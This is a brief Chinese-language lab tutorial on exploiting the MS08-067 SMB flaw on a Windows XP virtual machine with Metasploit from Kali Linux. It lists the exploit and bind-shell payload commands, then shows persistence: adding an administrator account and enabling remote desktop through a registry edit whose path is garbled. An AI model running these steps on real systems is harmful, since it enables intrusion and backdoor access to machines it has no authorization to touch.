kalilinux攻擊漏洞MS08 067
在這裡小編為大家介紹一下基於linux平臺的ms08_067漏洞的利用。我用VMware搭建了一個實驗環境, kalilinux: winxp 要做的就是用Kali Linux裡的Metasploit入侵WinXP
操作方法
(01)在Kali用命令 msfconsole 開啟Metasploit (在終端裡輸入msfconsole)
(02)然後執行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程式
(03)set LHOST #設定本地主機IP
(04)set RHOST #設定目標主機IP
(05)set payload windows/shell_bind_tcp #設定payload
(06)show options #檢視設定資訊
(07)exploit #實施攻擊
(08)攻擊成功,我們得到了一個cmdshell,接下來就是新建賬戶了。
(09)新增使用者名稱為zeal,密碼為zeal的使用者,並把zeal使用者新增到管理組。接下來執行命令 netstat -an 看一下目標主機開放埠的情況
(10)發現並沒有開啟3389(遠端桌面連線埠),我們需要手動開啟。需要執行命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
(11)有了目標主機的cmdshell你想做什麼不行吧?
(12)好了演示到此完畢!
特別提示
不要隨便攻擊別人,漏洞基本都修復了。
命令注意大小寫
目標的winxp最好是英文的